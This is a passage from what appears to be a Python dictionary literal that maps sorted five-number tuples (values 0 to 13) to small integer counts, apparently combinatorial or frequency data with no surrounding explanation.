(0, 3, 3, 4, 12): 1,
(0, 3, 3, 4, 13): 2,
(0, 3, 3, 5, 6): 2,
(0, 3, 3, 5, 7): 3,
(0, 3, 3, 5, 8): 1,
(0, 3, 3, 5, 9): 3,
(0, 3, 3, 5, 10): 1,
(0, 3, 3, 5, 11): 1,
(0, 3, 3, 5, 12): 4,
(0, 3, 3, 5, 13): 1,
(0, 3, 3, 6, 6): 3,
(0, 3, 3, 6, 7): 3,
(0, 3, 3, 6, 8): 4,
(0, 3, 3, 6, 9): 2,
(0, 3, 3, 6, 10): 1,
(0, 3, 3, 6, 11): 4,
(0, 3, 3, 6, 12): 4,
(0, 3, 3, 6, 13): 6,
(0, 3, 3, 7, 7): 3,
(0, 3, 3, 7, 8): 2,
(0, 3, 3, 7, 9): 3,
(0, 3, 3, 7, 10): 2,
(0, 3, 3, 7, 11): 2,
(0, 3, 3, 7, 12): 3,
(0, 3, 3, 7, 13): 2,
(0, 3, 3, 8, 9): 3,
(0, 3, 3, 8, 10): 1,
(0, 3, 3, 8, 11): 1,
(0, 3, 3, 8, 13): 1,
(0, 3, 3, 9, 10): 2,
(0, 3, 3, 9, 11): 3,
(0, 3, 3, 9, 12): 3,
(0, 3, 3, 9, 13): 4,
(0, 3, 3, 10, 11): 1,
(0, 3, 3, 10, 12): 1,
(0, 3, 3, 10, 13): 1,
(0, 3, 3, 11, 11): 1,
(0, 3, 3, 11, 12): 2,
(0, 3, 3, 11, 13): 2,
(0, 3, 3, 12, 13): 2,
(0, 3, 3, 13, 13): 1,
(0, 3, 4, 4, 6): 3,
(0, 3, 4, 4, 10): 2,
(0, 3, 4, 4, 13): 1,
(0, 3, 4, 5, 5): 2,
(0, 3, 4, 5, 6): 4,
(0, 3, 4, 5, 7): 3,
(0, 3, 4, 5, 9): 2,
(0, 3, 4, 5, 10): 3,
(0, 3, 4, 5, 11): 3,
(0, 3, 4, 5, 13): 2,
(0, 3, 4, 6, 6): 3,
(0, 3, 4, 6, 7): 5,
(0, 3, 4, 6, 8): 5,
(0, 3, 4, 6, 9): 6,
(0, 3, 4, 6, 10): 7,
(0, 3, 4, 6, 11): 4,
(0, 3, 4, 6, 12): 9,
(0, 3, 4, 6, 13): 1,
(0, 3, 4, 7, 7): 4,
(0, 3, 4, 7, 8): 2,
(0, 3, 4, 7, 9): 2,
(0, 3, 4, 7, 10): 2,
(0, 3, 4, 7, 11): 3,
(0, 3, 4, 7, 12): 1,
(0, 3, 4, 7, 13): 5,
(0, 3, 4, 8, 9): 1,
(0, 3, 4, 8, 10): 4,
(0, 3, 4, 8, 12): 2,
(0, 3, 4, 8, 13): 1,
(0, 3, 4, 9, 9): 3,
(0, 3, 4, 9, 10): 2,
(0, 3, 4, 9, 11): 3,
(0, 3, 4, 9, 12): 1,
(0, 3, 4, 9, 13): 1,
(0, 3, 4, 10, 10): 3,
(0, 3, 4, 10, 11): 2,
(0, 3, 4, 10, 12): 3,
(0, 3, 4, 10, 13): 3,
(0, 3, 4, 11, 12): 2,
(0, 3, 4, 11, 13): 1,
(0, 3, 4, 12, 13): 2,
(0, 3, 4, 13, 13): 1,
(0, 3, 5, 5, 6): 1,
(0, 3, 5, 5, 8): 1,
(0, 3, 5, 5, 9): 2,
(0, 3, 5, 5, 10): 1,
(0, 3, 5, 5, 11): 1,
(0, 3, 5, 5, 12): 1,
(0, 3, 5, 5, 13): 1,
(0, 3, 5, 6, 6): 2,
(0, 3, 5, 6, 7): 2,
(0, 3, 5, 6, 8): 3,
(0, 3, 5, 6, 9): 7,
(0, 3, 5, 6, 10): 2,
(0, 3, 5, 6, 11): 1,
(0, 3, 5, 6, 12): 4,
(0, 3, 5, 6, 13): 1,
(0, 3, 5, 7, 7): 3,
(0, 3, 5, 7, 8): 2,
(0, 3, 5, 7, 9): 4,
(0, 3, 5, 7, 10): 4,
(0, 3, 5, 7, 11): 1,
(0, 3, 5, 7, 12): 2,
(0, 3, 5, 7, 13): 1,
(0, 3, 5, 8, 9): 2,
(0, 3, 5, 8, 10): 1,
(0, 3, 5, 8, 11): 2,
(0, 3, 5, 8, 12): 1,
(0, 3, 5, 8, 13): 6,
(0, 3, 5, 9, 9): 4,
(0, 3, 5, 9, 10): 5,
(0, 3, 5, 9, 11): 3,
(0, 3, 5, 9, 12): 6,
(0, 3, 5, 9, 13): 2,
(0, 3, 5, 10, 11): 4,
(0, 3, 5, 10, 12): 3,
(0, 3, 5, 11, 11): 1,
(0, 3, 5, 11, 12): 1,
(0, 3, 5, 11, 13): 1,
(0, 3, 5, 12, 13): 1,
(0, 3, 6, 6, 6): 2,
(0, 3, 6, 6, 7): 1,
(0, 3, 6, 6, 8): 3,
(0, 3, 6, 6, 9): 3,
(0, 3, 6, 6, 10): 4,
(0, 3, 6, 6, 11): 2,
(0, 3, 6, 6, 12): 3,
(0, 3, 6, 6, 13): 2,
(0, 3, 6, 7, 7): 3,
(0, 3, 6, 7, 8): 4,
(0, 3, 6, 7, 9): 5,
(0, 3, 6, 7, 10): 2,
(0, 3, 6, 7, 11): 2,
(0, 3, 6, 7, 12): 7,
(0, 3, 6, 7, 13): 2,
(0, 3, 6, 8, 8): 2,
(0, 3, 6, 8, 9): 4,
(0, 3, 6, 8, 10): 2,
(0, 3, 6, 8, 11): 2,
(0, 3, 6, 8, 12): 6,
(0, 3, 6, 8, 13): 2,
(0, 3, 6, 9, 9): 2,
(0, 3, 6, 9, 10): 3,
(0, 3, 6, 9, 11): 6,
(0, 3, 6, 9, 12): 4,
(0, 3, 6, 9, 13): 4,
(0, 3, 6, 10, 10): 2,
(0, 3, 6, 10, 11): 2,
(0, 3, 6, 10, 12): 7,
(0, 3, 6, 10, 13): 1,
(0, 3, 6, 11, 12): 3,
(0, 3, 6, 11, 13): 1,
(0, 3, 6, 12, 12): 7,
(0, 3, 6, 12, 13): 2,
(0, 3, 7, 7, 7): 2,
(0, 3, 7, 7, 8): 2,
(0, 3, 7, 7, 9): 5,
(0, 3, 7, 7, 10): 4,
(0, 3, 7, 7, 11): 2,
(0, 3, 7, 7, 12): 1,
(0, 3, 7, 7, 13): 3,
(0, 3, 7, 8, 9): 2,
(0, 3, 7, 8, 10): 3,
(0, 3, 7, 8, 11): 3,
(0, 3, 7, 8, 13): 2,
(0, 3, 7, 9, 9): 3,
(0, 3, 7, 9, 10): 2,
(0, 3, 7, 9, 11): 3,
(0, 3, 7, 9, 12): 5,
(0, 3, 7, 9, 13): 1,
(0, 3, 7, 10, 11): 3,
(0, 3, 7, 10, 12): 3,
(0, 3, 7, 10, 13): 5,
(0, 3, 7, 11, 12): 1,
(0, 3, 7, 11, 13): 1,
(0, 3, 7, 12, 13): 1,
(0, 3, 8, 8, 10): 2,
(0, 3, 8, 8, 13): 1,
(0, 3, 8, 9, 9): 2,
(0, 3, 8, 9, 10): 2,
(0, 3, 8, 9, 11): 1,
(0, 3, 8, 9, 13): 2,
(0, 3, 8, 10, 12): 4,
(0, 3, 8, 11, 11): 2,
(0, 3, 8, 11, 13): 3,
(0, 3, 9, 9, 11): 2,
(0, 3, 9, 9, 12): 2,
(0, 3, 9, 9, 13): 4,
(0, 3, 9, 10, 11): 1,
(0, 3, 9, 10, 12): 2,
(0, 3, 9, 10, 13): 1,
(0, 3, 9, 11, 11): 1,
(0, 3, 9, 11, 12): 3,
(0, 3, 9, 11, 13): 1,
(0, 3, 9, 12, 13): 2,
(0, 3, 10, 10, 12): 1,
(0, 3, 10, 10, 13): 1,
(0, 3, 10, 11, 12): 1,
(0, 3, 10, 11, 13): 2,
(0, 3, 10, 12, 12): 2,
(0, 3, 10, 12, 13): 2,
(0, 3, 10, 13, 13): 2,
(0, 3, 11, 11, 13): 1,
(0, 3, 11, 12, 13): 1,
(0, 3, 12, 12, 13): 1,
(0, 3, 12, 13, 13): 1,
(0, 3, 13, 13, 13): 2,
(0, 4, 4, 4, 10): 1,
(0, 4, 4, 5, 6): 1,
(0, 4, 4, 5, 7): 1,
(0, 4, 4, 5, 8): 1,
(0, 4, 4, 5, 10): 1,
(0, 4, 4, 6, 6): 2,
(0, 4, 4, 6, 7): 1,
(0, 4, 4, 6, 8): 3,
(0, 4, 4, 6, 9): 3,
(0, 4, 4, 6, 10): 1,
(0, 4, 4, 6, 11): 2,
(0, 4, 4, 6, 12): 2,
(0, 4, 4, 6, 13): 2,
(0, 4, 4, 7, 7): 1,
(0, 4, 4, 7, 8): 1,
(0, 4, 4, 7, 10): 4,
(0, 4, 4, 8, 10): 3,
(0, 4, 4, 8, 11): 2,
(0, 4, 4, 8, 12): 1,
(0, 4, 4, 9, 10): 2,
(0, 4, 4, 10, 11): 1,
(0, 4, 4, 10, 12): 3,
(0, 4, 4, 10, 13): 1,
(0, 4, 4, 13, 13): 1,
(0, 4, 5, 5, 7): 1,
(0, 4, 5, 5, 8): 1,
(0, 4, 5, 5, 10): 1,
(0, 4, 5, 5, 13): 2,
(0, 4, 5, 6, 6): 1,
(0, 4, 5, 6, 7): 2,
(0, 4, 5, 6, 8): 5,
(0, 4, 5, 6, 9): 1,
(0, 4, 5, 6, 11): 1,
(0, 4, 5, 6, 12): 5,
(0, 4, 5, 6, 13): 2,
(0, 4, 5, 7, 7): 2,
(0, 4, 5, 7, 9): 3,
(0, 4, 5, 7, 10): 3,
(0, 4, 5, 7, 11): 4,
(0, 4, 5, 7, 13): 1,
(0, 4, 5, 8, 8): 1,
(0, 4, 5, 8, 10): 5,
(0, 4, 5, 9, 11): 2,
(0, 4, 5, 9, 12): 3,
(0, 4, 5, 9, 13): 1,
(0, 4, 5, 10, 10): 2,
(0, 4, 5, 10, 11): 2,
(0, 4, 5, 10, 12): 5,
(0, 4, 5, 10, 13): 2,
(0, 4, 5, 11, 11): 2,
(0, 4, 5, 11, 12): 1,
(0, 4, 5, 11, 13): 1,
(0, 4, 6, 6, 6): 2,
(0, 4, 6, 6, 7): 1,
(0, 4, 6, 6, 8): 1,
(0, 4, 6, 6, 9): 2,
(0, 4, 6, 6, 10): 2,
(0, 4, 6, 6, 11): 1,
(0, 4, 6, 6, 12): 3,
(0, 4, 6, 6, 13): 1,
(0, 4, 6, 7, 7): 1,
(0, 4, 6, 7, 8): 4,
(0, 4, 6, 7, 9): 3,
(0, 4, 6, 7, 10): 4,
(0, 4, 6, 7, 11): 3,
(0, 4, 6, 7, 12): 6,
(0, 4, 6, 7, 13): 1,
(0, 4, 6, 8, 9): 4,
(0, 4, 6, 8, 10): 5,
(0, 4, 6, 8, 11): 3,
(0, 4, 6, 8, 12): 3,
(0, 4, 6, 8, 13): 1,
(0, 4, 6, 9, 9): 3,
(0, 4, 6, 9, 10): 2,
(0, 4, 6, 9, 11): 2,
(0, 4, 6, 9, 12): 8,
(0, 4, 6, 9, 13): 2,
(0, 4, 6, 10, 11): 2,
(0, 4, 6, 10, 12): 5,
(0, 4, 6, 10, 13): 3,
(0, 4, 6, 11, 11): 1,
(0, 4, 6, 11, 12): 5,
(0, 4, 6, 11, 13): 1,
(0, 4, 6, 12, 12): 3,
(0, 4, 6, 12, 13): 2,
(0, 4, 7, 7, 7): 3,
(0, 4, 7, 7, 8): 1,
(0, 4, 7, 7, 9): 2,
(0, 4, 7, 7, 10): 1,
(0, 4, 7, 7, 11): 2,
(0, 4, 7, 7, 12): 1,
(0, 4, 7, 7, 13): 1,
(0, 4, 7, 8, 8): 1,
(0, 4, 7, 8, 10): 4,
(0, 4, 7, 8, 12): 1,
(0, 4, 7, 9, 10): 2,
(0, 4, 7, 9, 11): 3,
(0, 4, 7, 9, 12): 1,
(0, 4, 7, 9, 13): 1,
(0, 4, 7, 10, 10): 2,
(0, 4, 7, 10, 11): 1,
(0, 4, 7, 10, 12): 3,
(0, 4, 7, 10, 13): 2,
(0, 4, 7, 11, 13): 3,
(0, 4, 7, 12, 12): 1,
(0, 4, 7, 12, 13): 1,
(0, 4, 8, 8, 10): 2,
(0, 4, 8, 8, 11): 1,
(0, 4, 8, 8, 13): 1,
(0, 4, 8, 9, 10): 2,
(0, 4, 8, 9, 12): 3,
(0, 4, 8, 10, 10): 2,
(0, 4, 8, 10, 11): 4,
(0, 4, 8, 10, 12): 1,
(0, 4, 8, 10, 13): 3,
(0, 4, 8, 12, 12): 1,
(0, 4, 9, 10, 11): 1,
(0, 4, 9, 10, 12): 3,
(0, 4, 9, 10, 13): 1,
(0, 4, 9, 11, 11): 1,
(0, 4, 9, 11, 12): 1,
(0, 4, 9, 11, 13): 1,
(0, 4, 10, 10, 12): 1,
(0, 4, 10, 10, 13): 2,
(0, 4, 10, 11, 12): 1,
(0, 4, 10, 11, 13): 2,
(0, 4, 10, 12, 12): 1,
(0, 4, 10, 12, 13): 1,
(0, 4, 10, 13, 13): 1,
(0, 4, 11, 11, 13): 1,
(0, 4, 12, 12, 13): 1,
(0, 4, 12, 13, 13): 1,
(0, 5, 5, 5, 7): 1,
(0, 5, 5, 5, 8): 1,
(0, 5, 5, 5, 12): 1,
(0, 5, 5, 6, 6): 1,
(0, 5, 5, 6, 7): 2,
(0, 5, 5, 6, 8): 1,
(0, 5, 5, 6, 10): 1,
(0, 5, 5, 6, 11): 1,
(0, 5, 5, 6, 12): 2,
(0, 5, 5, 6, 13): 1,
(0, 5, 5, 7, 7): 2,
(0, 5, 5, 7, 8): 1,
(0, 5, 5, 7, 10): 1,
(0, 5, 5, 7, 11): 1,
(0, 5, 5, 7, 12): 2,
(0, 5, 5, 8, 9): 3,
(0, 5, 5, 8, 10): 2,
(0, 5, 5, 8, 11): 1,
(0, 5, 5, 10, 13): 1,
(0, 5, 5, 11, 12): 2,
(0, 5, 5, 11, 13): 1,
(0, 5, 5, 12, 13): 1,
(0, 5, 6, 6, 6): 3,
(0, 5, 6, 6, 7): 2,
(0, 5, 6, 6, 8): 2,
(0, 5, 6, 6, 11): 2,
(0, 5, 6, 6, 12): 2,
(0, 5, 6, 6, 13): 2,
(0, 5, 6, 7, 7): 3,
(0, 5, 6, 7, 8): 1,
(0, 5, 6, 7, 9): 3,
(0, 5, 6, 7, 10): 1,
(0, 5, 6, 7, 11): 3,
(0, 5, 6, 7, 12): 4,
(0, 5, 6, 7, 13): 3,
(0, 5, 6, 8, 8): 2,
(0, 5, 6, 8, 9): 1,
(0, 5, 6, 8, 10): 2,
(0, 5, 6, 8, 11): 2,
(0, 5, 6, 8, 12): 4,
(0, 5, 6, 9, 9): 3,
(0, 5, 6, 9, 10): 3,
(0, 5, 6, 9, 11): 1,
(0, 5, 6, 9, 12): 5,
(0, 5, 6, 10, 12): 4,
(0, 5, 6, 10, 13): 1,
(0, 5, 6, 11, 12): 2,
(0, 5, 6, 11, 13): 3,
(0, 5, 6, 12, 12): 5,
(0, 5, 6, 12, 13): 2,
(0, 5, 7, 7, 7): 2,
(0, 5, 7, 7, 8): 3,
(0, 5, 7, 7, 9): 1,
(0, 5, 7, 7, 10): 2,
(0, 5, 7, 7, 11): 2,
(0, 5, 7, 7, 12): 4,
(0, 5, 7, 7, 13): 2,
(0, 5, 7, 8, 8): 1,
(0, 5, 7, 8, 9): 3,
(0, 5, 7, 8, 10): 2,
(0, 5, 7, 8, 11): 1,
(0, 5, 7, 8, 13): 1,
(0, 5, 7, 9, 9): 1,
(0, 5, 7, 9, 10): 3,
(0, 5, 7, 9, 11): 1,
(0, 5, 7, 9, 12): 1,
(0, 5, 7, 10, 10): 1,
(0, 5, 7, 10, 11): 3,
(0, 5, 7, 10, 12): 1,
(0, 5, 7, 11, 11): 2,
(0, 5, 7, 11, 12): 3,
(0, 5, 7, 11, 13): 2,
(0, 5, 7, 12, 12): 1,
(0, 5, 7, 12, 13): 3,
(0, 5, 7, 13, 13): 1,
(0, 5, 8, 8, 10): 2,
(0, 5, 8, 9, 10): 2,
(0, 5, 8, 9, 11): 4,
(0, 5, 8, 10, 10): 2,
(0, 5, 8, 10, 11): 1,
(0, 5, 8, 10, 12): 4,
(0, 5, 8, 10, 13): 2,
(0, 5, 8, 11, 13): 2,
(0, 5, 8, 12, 12): 1,
(0, 5, 9, 9, 12): 3,
(0, 5, 9, 10, 12): 1,
(0, 5, 9, 10, 13): 3,
(0, 5, 9, 11, 12): 1,
(0, 5, 9, 11, 13): 1,
(0, 5, 10, 10, 11): 1,
(0, 5, 10, 11, 13): 2,
(0, 5, 10, 13, 13): 1,
(0, 5, 11, 11, 13): 1,
(0, 5, 11, 12, 13): 2,
(0, 5, 11, 13, 13): 2,
(0, 5, 12, 12, 13): 1,
(0, 6, 6, 6, 6): 1,
(0, 6, 6, 6, 7): 2,
(0, 6, 6, 6, 8): 2,
(0, 6, 6, 6, 9): 2,
(0, 6, 6, 6, 10): 1,
(0, 6, 6, 6, 11): 1,
(0, 6, 6, 6, 12): 3,
(0, 6, 6, 6, 13): 2,
(0, 6, 6, 7, 7): 3,
(0, 6, 6, 7, 8): 3,
(0, 6, 6, 7, 9): 1,
(0, 6, 6, 7, 10): 1,
(0, 6, 6, 7, 11): 1,
(0, 6, 6, 7, 12): 2,
(0, 6, 6, 7, 13): 4,
(0, 6, 6, 8, 8): 2,
(0, 6, 6, 8, 9): 4,
(0, 6, 6, 8, 10): 1,
(0, 6, 6, 8, 11): 1,
(0, 6, 6, 8, 12): 3,
(0, 6, 6, 8, 13): 2,
(0, 6, 6, 9, 9): 1,
(0, 6, 6, 9, 10): 2,
(0, 6, 6, 9, 12): 2,
(0, 6, 6, 9, 13): 1,
(0, 6, 6, 10, 10): 1,
(0, 6, 6, 10, 11): 1,
(0, 6, 6, 10, 12): 2,
(0, 6, 6, 10, 13): 1,
(0, 6, 6, 11, 11): 1,
(0, 6, 6, 11, 12): 2,
(0, 6, 6, 11, 13): 1,
(0, 6, 6, 12, 12): 1,
(0, 6, 6, 12, 13): 3,
(0, 6, 6, 13, 13): 2,
(0, 6, 7, 7, 7): 2,
(0, 6, 7, 7, 8): 2,
(0, 6, 7, 7, 9): 2,
(0, 6, 7, 7, 10): 1,
(0, 6, 7, 7, 11): 2,
(0, 6, 7, 7, 12): 2,
(0, 6, 7, 7, 13): 4,
(0, 6, 7, 8, 8): 2,
(0, 6, 7, 8, 9): 1,
(0, 6, 7, 8, 10): 2,
(0, 6, 7, 8, 11): 1,
(0, 6, 7, 8, 12): 4,
(0, 6, 7, 8, 13): 3,
(0, 6, 7, 9, 9): 1,
(0, 6, 7, 9, 10): 1,
(0, 6, 7, 9, 11): 2,
(0, 6, 7, 9, 12): 3,
(0, 6, 7, 9, 13): 1,
(0, 6, 7, 10, 10): 1,
(0, 6, 7, 10, 11): 2,
(0, 6, 7, 10, 12): 3,
(0, 6, 7, 10, 13): 1,
(0, 6, 7, 11, 11): 1,
(0, 6, 7, 11, 12): 3,
(0, 6, 7, 11, 13): 1,
(0, 6, 7, 12, 12): 3,
(0, 6, 7, 12, 13): 2,
(0, 6, 7, 13, 13): 2,
(0, 6, 8, 8, 8): 1,
(0, 6, 8, 8, 9): 1,
(0, 6, 8, 8, 11): 1,
(0, 6, 8, 8, 13): 1,
(0, 6, 8, 9, 9): 1,
(0, 6, 8, 9, 10): 2,
(0, 6, 8, 9, 12): 6,
(0, 6, 8, 10, 10): 3,
(0, 6, 8, 10, 11): 3,
(0, 6, 8, 10, 13): 1,
(0, 6, 8, 11, 11): 1,
(0, 6, 8, 11, 12): 2,
(0, 6, 8, 12, 12): 2,
(0, 6, 8, 12, 13): 3,
(0, 6, 8, 13, 13): 1,
(0, 6, 9, 9, 10): 1,
(0, 6, 9, 9, 11): 2,
(0, 6, 9, 9, 12): 1,
(0, 6, 9, 9, 13): 1,
(0, 6, 9, 10, 12): 3,
(0, 6, 9, 11, 12): 2,
(0, 6, 9, 11, 13): 1,
(0, 6, 9, 12, 12): 4,
(0, 6, 9, 12, 13): 2,
(0, 6, 10, 10, 13): 2,
(0, 6, 10, 11, 12): 1,
(0, 6, 10, 12, 13): 2,
(0, 6, 10, 13, 13): 1,
(0, 6, 11, 11, 13): 2,
(0, 6, 11, 12, 12): 1,
(0, 6, 11, 12, 13): 1,
(0, 6, 12, 12, 12): 1,
(0, 7, 7, 7, 7): 1,
(0, 7, 7, 7, 8): 3,
(0, 7, 7, 7, 9): 1,
(0, 7, 7, 7, 10): 2,
(0, 7, 7, 7, 11): 1,
(0, 7, 7, 7, 12): 2,
(0, 7, 7, 7, 13): 2,
(0, 7, 7, 8, 8): 1,
(0, 7, 7, 8, 9): 1,
(0, 7, 7, 8, 11): 1,
(0, 7, 7, 8, 13): 2,
(0, 7, 7, 9, 9): 1,
(0, 7, 7, 9, 10): 1,
(0, 7, 7, 9, 12): 2,
(0, 7, 7, 9, 13): 1,
(0, 7, 7, 10, 10): 1,
(0, 7, 7, 10, 11): 1,
(0, 7, 7, 10, 13): 2,
(0, 7, 7, 11, 11): 1,
(0, 7, 7, 11, 12): 1,
(0, 7, 7, 11, 13): 1,
(0, 7, 7, 12, 12): 1,
(0, 7, 7, 12, 13): 2,
(0, 7, 7, 13, 13): 2,
(0, 7, 8, 8, 10): 1,
(0, 7, 8, 9, 11): 1,
(0, 7, 8, 9, 12): 1,
(0, 7, 8, 9, 13): 2,
(0, 7, 8, 10, 11): 1,
(0, 7, 8, 10, 12): 3,
(0, 7, 8, 11, 13): 1,
(0, 7, 9, 9, 12): 3,
(0, 7, 9, 10, 11): 3,
(0, 7, 9, 10, 13): 1,
(0, 7, 9, 11, 12): 1,
(0, 7, 9, 12, 13): 1,
(0, 7, 9, 13, 13): 1,
(0, 7, 10, 10, 12): 1,
(0, 7, 10, 11, 13): 1,
(0, 7, 10, 12, 12): 1,
(0, 7, 10, 12, 13): 1,
(0, 7, 11, 11, 13): 1,
(0, 7, 11, 12, 12): 1,
(0, 7, 11, 12, 13): 2,
(0, 8, 8, 9, 13): 1,
(0, 8, 8, 10, 12): 2,
(0, 8, 8, 10, 13): 2,
(0, 8, 8, 11, 11): 1,
(0, 8, 8, 13, 13): 1,
(0, 8, 9, 10, 12): 1,
(0, 8, 9, 10, 13): 1,
(0, 8, 9, 11, 11): 1,
(0, 8, 9, 11, 13): 1,
(0, 8, 9, 12, 13): 1,
(0, 8, 10, 10, 11): 1,
(0, 8, 10, 11, 12): 1,
(0, 8, 10, 11, 13): 2,
(0, 8, 10, 12, 12): 1,
(0, 8, 10, 12, 13): 2,
(0, 8, 11, 11, 12): 1,
(0, 8, 11, 13, 13): 2,
(0, 9, 9, 11, 12): 2,
(0, 9, 9, 11, 13): 1,
(0, 9, 9, 12, 12): 1,
(0, 9, 10, 10, 13): 1,
(0, 9, 10, 11, 11): 1,
(0, 9, 10, 11, 12): 2,
(0, 9, 10, 11, 13): 1,
(0, 9, 10, 12, 12): 2,
(0, 9, 10, 13, 13): 1,
(0, 9, 11, 11, 11): 1,
(0, 9, 11, 12, 13): 1,
(0, 10, 10, 10, 12): 1,
(0, 10, 10, 11, 11): 1,
(0, 10, 10, 11, 12): 1,
(0, 10, 10, 12, 13): 1,
(0, 10, 11, 11, 13): 1,
(1, 1, 1, 1, 13): 1,
(1, 1, 1, 2, 7): 2,
(1, 1, 1, 2, 10): 2,
(1, 1, 1, 2, 11): 2,
(1, 1, 1, 2, 12): 2,
(1, 1, 1, 2, 13): 1,
(1, 1, 1, 3, 6): 2,
(1, 1, 1, 3, 7): 2,
(1, 1, 1, 3, 8): 1,
(1, 1, 1, 3, 10): 1,
(1, 1, 1, 3, 11): 3,
(1, 1, 1, 3, 12): 2,
(1, 1, 1, 3, 13): 3,
(1, 1, 1, 4, 5): 1,
(1, 1, 1, 4, 6): 3,
(1, 1, 1, 4, 7): 2,
(1, 1, 1, 4, 8): 2,
(1, 1, 1, 4, 9): 1,
(1, 1, 1, 4, 10): 4,
(1, 1, 1, 4, 11): 3,
(1, 1, 1, 4, 12): 3,
(1, 1, 1, 4, 13): 1,
(1, 1, 1, 5, 5): 1,
(1, 1, 1, 5, 6): 2,
(1, 1, 1, 5, 7): 3,
(1, 1, 1, 5, 8): 2,
(1, 1, 1, 5, 9): 4,
(1, 1, 1, 5, 10): 1,
(1, 1, 1, 5, 11): 1,
(1, 1, 1, 5, 12): 1,
(1, 1, 1, 5, 13): 1,
(1, 1, 1, 6, 6): 1,
(1, 1, 1, 6, 7): 3,
(1, 1, 1, 6, 8): 4,
(1, 1, 1, 6, 9): 1,
(1, 1, 1, 6, 10): 1,
(1, 1, 1, 6, 12): 3,
(1, 1, 1, 6, 13): 1,
(1, 1, 1, 7, 7): 2,
(1, 1, 1, 7, 8): 2,
(1, 1, 1, 7, 9): 2,
(1, 1, 1, 7, 10): 1,
(1, 1, 1, 7, 11): 1,
(1, 1, 1, 7, 12): 1,
(1, 1, 1, 7, 13): 2,
(1, 1, 1, 8, 8): 1,
(1, 1, 1, 8, 12): 2,
(1, 1, 1, 8, 13): 1,
(1, 1, 1, 9, 11): 2,
(1, 1, 1, 9, 12): 2,
(1, 1, 1, 9, 13): 1,
(1, 1, 1, 10, 10): 1,
(1, 1, 1, 10, 11): 1,
(1, 1, 1, 10, 12): 2,
(1, 1, 1, 11, 11): 1,
(1, 1, 2, 2, 6): 2,
(1, 1, 2, 2, 7): 4,
(1, 1, 2, 2, 8): 1,
(1, 1, 2, 2, 9): 1,
(1, 1, 2, 2, 10): 6,
(1, 1, 2, 2, 11): 7,
(1, 1, 2, 2, 12): 3,
(1, 1, 2, 2, 13): 4,
(1, 1, 2, 3, 5): 6,
(1, 1, 2, 3, 6): 8,
(1, 1, 2, 3, 7): 6,
(1, 1, 2, 3, 8): 6,
(1, 1, 2, 3, 9): 5,
(1, 1, 2, 3, 10): 8,
(1, 1, 2, 3, 11): 8,
(1, 1, 2, 3, 12): 11,
(1, 1, 2, 3, 13): 5,
(1, 1, 2, 4, 4): 1,
(1, 1, 2, 4, 5): 7,
(1, 1, 2, 4, 6): 6,
(1, 1, 2, 4, 7): 8,
(1, 1, 2, 4, 8): 5,
(1, 1, 2, 4, 9): 9,
(1, 1, 2, 4, 10): 5,
(1, 1, 2, 4, 11): 7,
(1, 1, 2, 4, 12): 8,
(1, 1, 2, 4, 13): 10,
(1, 1, 2, 5, 5): 2,
(1, 1, 2, 5, 6): 6,
(1, 1, 2, 5, 7): 5,
(1, 1, 2, 5, 8): 9,
(1, 1, 2, 5, 9): 6,
(1, 1, 2, 5, 10): 8,
(1, 1, 2, 5, 11): 6,
(1, 1, 2, 5, 12): 9,
(1, 1, 2, 5, 13): 5,
(1, 1, 2, 6, 6): 1,
(1, 1, 2, 6, 7): 6,
(1, 1, 2, 6, 8): 4,
(1, 1, 2, 6, 9): 9,
(1, 1, 2, 6, 10): 6,
(1, 1, 2, 6, 11): 7,
(1, 1, 2, 6, 12): 8,
(1, 1, 2, 6, 13): 7,
(1, 1, 2, 7, 7): 3,
(1, 1, 2, 7, 8): 8,
(1, 1, 2, 7, 9): 4,
(1, 1, 2, 7, 10): 6,
(1, 1, 2, 7, 11): 2,
(1, 1, 2, 7, 12): 7,
(1, 1, 2, 7, 13): 6,
(1, 1, 2, 8, 8): 1,
(1, 1, 2, 8, 9): 3,
(1, 1, 2, 8, 10): 5,
(1, 1, 2, 8, 11): 6,
(1, 1, 2, 8, 12): 5,
(1, 1, 2, 8, 13): 6,
(1, 1, 2, 9, 9): 1,
(1, 1, 2, 9, 10): 3,
(1, 1, 2, 9, 11): 6,
(1, 1, 2, 9, 12): 9,
(1, 1, 2, 9, 13): 5,
(1, 1, 2, 10, 10): 3,
(1, 1, 2, 10, 11): 6,
(1, 1, 2, 10, 12): 5,
(1, 1, 2, 10, 13): 5,
(1, 1, 2, 11, 11): 3,
(1, 1, 2, 11, 12): 5,
(1, 1, 2, 12, 13): 2,
(1, 1, 2, 13, 13): 1,
(1, 1, 3, 3, 4): 3,
(1, 1, 3, 3, 5): 3,
(1, 1, 3, 3, 6): 6,
(1, 1, 3, 3, 7): 3,
(1, 1, 3, 3, 8): 3,
(1, 1, 3, 3, 9): 3,
(1, 1, 3, 3, 10): 3,
(1, 1, 3, 3, 11): 3,
(1, 1, 3, 3, 12): 4,
(1, 1, 3, 3, 13): 2,
(1, 1, 3, 4, 4): 2,
(1, 1, 3, 4, 5): 5,
(1, 1, 3, 4, 6): 5,
(1, 1, 3, 4, 7): 7,
(1, 1, 3, 4, 8): 6,
(1, 1, 3, 4, 9): 9,
(1, 1, 3, 4, 10): 7,
(1, 1, 3, 4, 11): 6,
(1, 1, 3, 4, 12): 12,
(1, 1, 3, 4, 13): 4,
(1, 1, 3, 5, 5): 2,
(1, 1, 3, 5, 6): 3,
(1, 1, 3, 5, 7): 5,
(1, 1, 3, 5, 8): 5,
(1, 1, 3, 5, 9): 7,
(1, 1, 3, 5, 10): 6,
(1, 1, 3, 5, 11): 7,
(1, 1, 3, 5, 12): 6,
(1, 1, 3, 5, 13): 5,
(1, 1, 3, 6, 6): 4,
(1, 1, 3, 6, 7): 6,
(1, 1, 3, 6, 8): 9,
(1, 1, 3, 6, 9): 7,
(1, 1, 3, 6, 10): 8,
(1, 1, 3, 6, 11): 5,
(1, 1, 3, 6, 12): 10,
(1, 1, 3, 6, 13): 9,
(1, 1, 3, 7, 7): 3,
(1, 1, 3, 7, 8): 4,
(1, 1, 3, 7, 9): 8,
(1, 1, 3, 7, 10): 5,
(1, 1, 3, 7, 11): 7,
(1, 1, 3, 7, 12): 6,
(1, 1, 3, 7, 13): 5,
(1, 1, 3, 8, 8): 3,
(1, 1, 3, 8, 9): 4,
(1, 1, 3, 8, 10): 7,
(1, 1, 3, 8, 11): 4,
(1, 1, 3, 8, 12): 6,
(1, 1, 3, 8, 13): 2,
(1, 1, 3, 9, 9): 4,
(1, 1, 3, 9, 10): 6,
(1, 1, 3, 9, 11): 4,
(1, 1, 3, 9, 12): 7,
(1, 1, 3, 9, 13): 6,
(1, 1, 3, 10, 10): 3,
